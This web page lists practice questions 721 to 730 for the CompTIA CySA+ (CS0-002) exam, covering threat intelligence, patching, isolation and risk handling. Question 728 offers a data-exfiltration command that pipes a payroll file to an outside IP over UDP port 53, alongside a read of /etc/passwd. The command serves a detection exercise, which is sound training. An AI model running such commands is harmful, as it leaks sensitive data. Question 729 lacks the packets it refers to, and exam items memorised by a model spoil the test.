1. Home
  2. CompTIA
  3. CS0-002

CompTIA CS0-002 Online Practice Questions and Exam Preparation

CS0-002 Exam Details

  • Exam Code
    :CS0-002
  • Exam Name
    :CompTIA Cybersecurity Analyst (CySA+)
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :1059 Q&As
  • Last Updated
    :May 30, 2026

CompTIA CS0-002 Online Questions & Answers

  • Question 721:

    A security analyst is required to stay current with the most recent threat data and intelligence reports. When gathering data, it is MOST important for the data to be:

    A. proprietary and timely
    B. proprietary and accurate
    C. relevant and deep
    D. relevant and accurate

  • Question 722:

    A monthly job to install approved vendor software updates and hot fixes recently stopped working. The security team performed a vulnerability scan, which identified several hosts as having some critical OS vulnerabilities, as referenced in the common vulnerabilities and exposures (CVE) database.

    Which of the following should the security team do NEXT to resolve the critical findings in the most effective manner? (Choose two.)

    A. Patch the required hosts with the correct updates and hot fixes, and rescan them for vulnerabilities.
    B. Remove the servers reported to have high and medium vulnerabilities.
    C. Tag the computers with critical findings as a business risk acceptance.
    D. Manually patch the computers on the network, as recommended on the CVE website.
    E. Harden the hosts on the network, as recommended by the NIST framework.
    F. Resolve the monthly job issues and test them before applying them to the production network.

  • Question 723:

    Which of the following policies would state an employee should not disable security safeguards, such as host firewalls and antivirus on company systems?

    A. Code of conduct policy
    B. Account management policy
    C. Password policy
    D. Acceptable use policy

  • Question 724:

    A worm was detected on multiple PCs within the remote office. The security analyst recommended that the remote office be blocked from the corporate network during the incident response. Which of the following processes BEST describes this recommendation?

    A. Logical isolation of the remote office
    B. Sanitization of the network environment
    C. Segmentation of the network
    D. Secure disposal of affected systems

  • Question 725:

    In system hardening, which of the following types of vulnerability scans would work BEST to verify the scanned device meets security policies?

    A. SCAP
    B. Burp Suite
    C. OWASP ZAP
    D. Unauthenticated

  • Question 726:

    Which of the following is the BEST security practice to prevent ActiveX controls from running malicious code on a user's web application?

    A. Deploying HIPS to block malicious ActiveX code
    B. Installing network-based IPS to block malicious ActiveX code
    C. Adjusting the web-browser settings to block ActiveX controls
    D. Configuring a firewall to block traffic on ports that use ActiveX controls

  • Question 727:

    An organization is required to be able to consume multiple threat feeds simultaneously and to provide actionable intelligence to various teams. The organization would also like to be able to leverage the intelligence to enrich security event data. Which of the following functions would most likely help the security analyst meet the organization's requirements?

    A. Vulnerability management
    B. Risk management
    C. Detection and monitoring
    D. Incident response

  • Question 728:

    A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?

    A. nmap -A -sV 192.168.1.235
    B. cat payroll.csv > /dev/udp/123.456.123.456/53
    C. cat/etc/passwd
    D. mysql -h 192.168.1.235 -u test -p

  • Question 729:

    A security analyst is reviewing packet captures for a specific server that is suspected of containing malware and discovers the following packets: Which of the following traffic patterns or data would be MOST concerning to the security analyst?

    A. Port used for SMTP traffic from 73.252.34.101
    B. Unencrypted password sent from 103.34.243.12
    C. Anonymous access granted by 103.34.243.12
    D. Ports used for HTTP traffic from 202.53.245.78

  • Question 730:

    A security analyst is providing a risk assessment for a medical device that will be installed on the corporate network. During the assessment, the analyst discovers the device has an embedded operating system that will be at the end of its life in two years. Due to the criticality of the device, the security committee makes a risk- based policy decision to review and enforce the vendor upgrade before the end of life is reached. Which of the following risk actions has the security committee taken?

    A. Risk exception
    B. Risk avoidance
    C. Risk tolerance
    D. Risk acceptance

Related Exams:

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CS0-002 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.